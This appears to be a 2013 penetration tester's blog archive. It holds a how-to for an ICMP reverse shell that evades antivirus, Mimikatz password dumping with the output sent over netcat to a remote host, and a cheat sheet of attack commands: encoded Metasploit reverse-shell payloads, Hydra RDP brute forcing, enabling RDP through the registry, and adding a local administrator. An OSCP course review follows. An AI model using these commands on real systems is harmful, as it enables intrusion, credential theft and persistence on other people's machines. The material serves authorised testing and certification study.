Saturday, 21 December 2013

ICMP Reverse Shell

Every time while penetration testing, we come across scenarios where we need to get shell on remote box, and most handy tool is Metasploit Meterpreter which most of our Smart Antiviruses detects and quickly we need some way to get around.

We can try ICMP Reverse shell, which I recently tested on my machine.
Most important thing, It don't require Administrator access to machine we can just use it on the fly.

I know there are lot of articles on ICMP shell over internet, but this is just for quick reference.

Download ICMP Shell from :

1. Upload "icmpsh.exe" on victim machine, trust me Antivirus didn't detect in my case.
2. Execute "icmpsh.exe -t <Attackers IP> -d 500 -b 30 -s 128"
3. Start listener on Attacker machine with "python <attacker's IP> <Victims IP> "
4. Or you can use listener scripts "./" which will generate Step 2 command for you, and start listener 

Exported Shell through ICMP

Windows Shell

For more details you can visit :

Hope this is helpful!..

Sunday, 15 December 2013

Mimikatz Logs and Netcat

Imagine a scenario where you have access to Active Directory, or Mail Server and you are able to run mimikatz on the server (This is Practical Scenario) , I am damn sure you will get hell lot of passwords out of it may be in 1000's , but problems you may face is output of mimikatz will so large that you can't copy it even after increasing your command prompt buffer, and decided to look for ways of saving Mimikatz output in some file, as there is very little info I could find, and decided to write little article on this.

Mimikatz Author Webpage Here

Log Mimikatz Output using "log command"

Using log Command

Generated Log File

Log Mimikatz output in file Manually:

Batch Command Method

Export Mimikatz Shell to Remote Machine Through Netcat :

Exporting Mimikatz Shell

Mimikatz through Netcat

Export Mimikatz Output to Remote Console

Exported Mimikatz Output

Mimikatz Output on remote console

Exported Mimikatz Output in file On remote machine

List of Commands Used:

  • mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit
  • mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit
  • mimikatz.exe ""privilege::debug"" ""log d:\log.txt sekurlsa::logonpasswords full"" exit
  • mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> d:\log.txt
  • nc.exe -vv IP 443 -e mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full "" exit
  • mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit | nc.exe -vv 443

Best Netcat Cheet Sheets from SANS Here

I Hope this article will be helpful to all of you!

Thursday, 12 December 2013

Linux Privilege Escalation Enumeration Shell Script

I have created little shell script for Linux Privilege Escalation Enumeration, and have uploaded on github, I am going to add few more stuff in the script soon to make it a bit advanced, I am sure it will help all of us.

Download Scripts:

Also You Can refer below script:

Hope this is helpful, let me know in case it needs modifications, I will be happy to work on it.

Penetration Testing Necessary Links and Handy Commands

I personally require quick access to few commands, and some links while working on Penetration Testing exercises, so decided to post below information on this blog :)

General Links 

Privilege Escalation Links:
Handy Commands:

Scans all ports with 10000 Pakctes rate:

unicornscan X.X.X.X:a -r10000 -v


python -c 'import pty;pty.spawn("/bin/bash")'
python -m SimpleHTTPServer   (Starting HTTP Server)


hydra  -l admin -P /root/Desktop/passwords -S X.X.X.X rdp   (Self Explanatory)

Mount Remote Windows Share:

smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw

Metasploit Payloads:

msfpayload windows/meterpreter/reverse_tcp LHOST= X > system.exe
msfpayload php/meterpreter/reverse_tcp LHOST= LPORT=443 R > exploit.php
msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=443 R | msfencode -t asp -o file.asp
msfpayload windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=443 R |  msfencode -e x86/shikata_ga_nai -b "\x00" -t c

Plink Tunnel:

plink.exe -P 22 -l root -pw "1234" -R 445: X.X.X.X

Enable RDP Access:

reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
netsh firewall set service remoteadmin enable 
netsh firewall set service remotedesktop enable

Nmap WebDAV Scanning:

nmap -p80,8080 --script=http-iis-webdav-vuln


run getgui -u admin -p 1234
run vnc -p 5043

Add User Windows:

net user test 1234 /add
net localgroup administrators test /add


sekurlsa::logonPasswords full

Compiling Windows Exploits on Backtrack:

cd /root/.wine/drive_c/MinGW/bin
wine gcc -o ability.exe /tmp/exploit.c -lwsock32
wine ability.exe

Nasm Command:

nasm -f bin -o payload.bin payload.asm

To Be Continued....

Hope its helpful to all of you!

Tuesday, 10 December 2013

Pentesting With BackTrack (PWB) & Offensive Security Certified Professional (OSCP) Reviews 2013


My OSCP Certification Journey started on 15th Septmber 2013, It is really a great course, and I really
loved it, However today i became OSCP :)

On "Tue 12/10/2013 7:27 PM" I got an official E-Mail from Offensive Security :

Prerequisites :

  1. You must have hands on experience with Linux as well as Windows.
  2. Web Application Programming experience should be really helpful, as you can grasp it quickly.
  3. I would say get your hands dirty with Python and Shell scripting it will help you a lot.
  4. "Out Of Box" Thinking is required, Spoon feeding will not help you.
  5. It is not for Book Worms!...
  6. Self Learning is very important.
  7. Debugging skills are necessary.
  8. Database knowledge is Advantage, You may get situations where it will be necessary.
  9. Get familiar with Backtrack thoroughly 

OSCP Certification Review Links:

What You Will Need :

  1. I personally recommend Backtrack 5 R3, It has everything you need
  2. You can go for other distros like Gnacktrack if you are familiar with it.
  3. I will post some handy scripts and tools here soon , which you can add it and will same your time

Signing Up For PWB Course:

I decided to go for PWB (Penetration Testing With Backtrack) in early September,I read as many reviews
as I could, before signing up. At first I was a bit worried, as I decided to go for 2 Months lab due to Office works. Apart from this Course fee was 950$ and "Dollar" rates were going Up while "Indian Rupee" was falling, I can say overall hard time!

Couse Material:

Made up my mind, And finally Signed Up for the PWB Course!! Once you sign up for the course, You will get course material within few weeks, and your course material includes, Videos + PDF Guide.

  1. Course syllabus was really good and well designed, you can check it here 
  2. Videos + PDF are purely Conceptual and Highly Practical.
  3. Go through each and every material and try to replicate it on your local machine.
  4. Loop back videos until you are 100% clear about concept mentioned.

PWB Labs:

Most fun part is PWB Labs, where you will get VPN access to PWB lab, consist of Vulnerable Servers, I
dove deep into it since my first day and was simultaneously reading course material, trust me this is not for those who want spoon feeding. Course Material and Labs are completely different.

Lab consist of different networks (IT, Admin, Development), as like corporate environment and your
goal is to penetrate through each network and get "r00t/Admin" access on servers. Since Day 1, My goal was to get into ADMIN department, and after long wait...Patience...Most important  sleepless nights...,
I finally did it!

I would recommend to play minimum 6-7 Hours Daily in PWB Labs, which I was fortunate to do, managing my office work, (from 7 PM to 2-3 AM Night), apart from this you can connect with community interact with different people from different region through IRC channels.

There comes time while working on lab, when I really started feeling exhausted, and All you can here
from everyone is "Try Harder".

Lab Tips:

  1. I recommend to honestly work on Lab's try to get as much hosts as you can
  2. Try to replicate each and every thing mentioned in Videos and PDF
  3. If you are not able to r00t some server in Lab, would say move on to next and am sure you will get it later
  4. Recommend to work on Lab documentation, it will definitely prepare you well, also will help you further in your career.
  5. Interact with people over IRC, am sure you will make some good friends.
  6. Most importantly Don't lose patience while working on any exercise.
  7. If you are not able to find ways, I would say go back to Course Material and you will get some directions.
  8. There are some beautiful boxes, don't Miss them, set your target to get it.
  9. Try to exploit a box, from various perspective, you will find multiple ways to get in.
  10. Try to look for juicy information on each and every exploited box, Its like                               "Alibaba And Chalis Chors....Khul Ja Sim Sim" , You will never know what Offsec Team have planted in machine to surprise you.
  11. If you are neglecting small "X" thing I would say visit it once again.
  12. "Try Hard" to get Joy of exploitation.

All I can say is, "A burning desire is the starting point of all accomplishment.Just like a small fire cannot give much heat, a weak desire cannot produce great results". This is where and an OffSec Student makes a significant difference.


Regarding exam I won't share any details, All I can say is its Challenging, take it as challenge and get it.
Its really tough test of what you have done all over the course period, I took complete 24 Hours to finish up this exam, Sleepless night, Stressed mind, I used to take breaks in between to refresh my mind, but only for 5-10 Minutes, Cup of coffee will surely help you to get rid of your sleeping habits!

Once I finished with my exam, I slept for 10 Hours, and then started working on Report Creation for which I took around 7 hours, I personally submitted both Lab and Exam Documentation.

Within 1 and half days Result was Positive!....:) and Rest was a History!

Exam Tips:

  1. If you have worked on Lab honestly , you would have gathered bunch of information, I would say compile those Links, Important and Handy Commands, and sort it carefully, which will save your time in exam
  2. Get complete rest before starting exam, Most importantly keep Coffee Packets Ready!
  3. Read Exam Instructions carefully word by word don't miss any single word, else it will surely mess up.
  4. Define Max amount of time you will work on each machine, once time is up, move on to next box.
  5. I personally took opposite approach of what others took, I started with machines first which seems a bit tough for me, If you are not sure about yourselves, I would recommend to get low valued machines first.
  6. Do not Update any tools before exam, it will mess up the stability, I updated one of the tool and had to spend 20 minutes on it, but was able to get rid of it.
  7. Take backups frequently, who knows VM may crash due to something.....
  8. Take as much screenshots as you can, step by step, Don't forget to get important screenshot due to excitement, Its natural we get more excited when we get r00tw00t, and later on you realize about missing screenshots, name it appropriately, which will save your time while working on report.
  9. I would say, Attend all, struggle till last moment, don't loose patience, at some point you may feel, you have enough points to pass exam, but trust me it can be an illusion, so always set goal to attend all!..
  10. Even if you are unable to get complete access, document your steps, it may help you.
  11. Enumeration is the key!...if you are unable to get direction loop it back to Enumeration step.
  12. At some point you will feel, You have done it...but when you run it will fail, I would say think about reason behind it, accordingly recreate it and you will succeed.
  13. If "X" way is not working, Try "Y" then try "Z", don't loop back to same way again and again.
  14. It requires Complete Madness, Capacity to struggle till last moment, and most importantly patience!

Documentation Tips:

  1. Include Lab documentation as well with you exam document.
  2. Step by step screenshots with appropriate information.
  3. Once finished, go through documents 2-3 times, and am sure you will find some small mistakes.
  4. Keep same format throughout the document, provide as much information as you can.

Ultimately Remember Few Things:

"The motivation to succeed comes from the burning desire to achieve a purpose"

"Whatever the mind of man can conceive and believe, the mind can achieve"

"The journey to being your best is not easy. It is full of setbacks. Winners have the ability to overcome and bounce back with even greater resolve"

"The best teachers will not give you something to drink, they will make you thirsty. 
They will put you on a path to seek answers" - For Offensive Security

To Be Continued....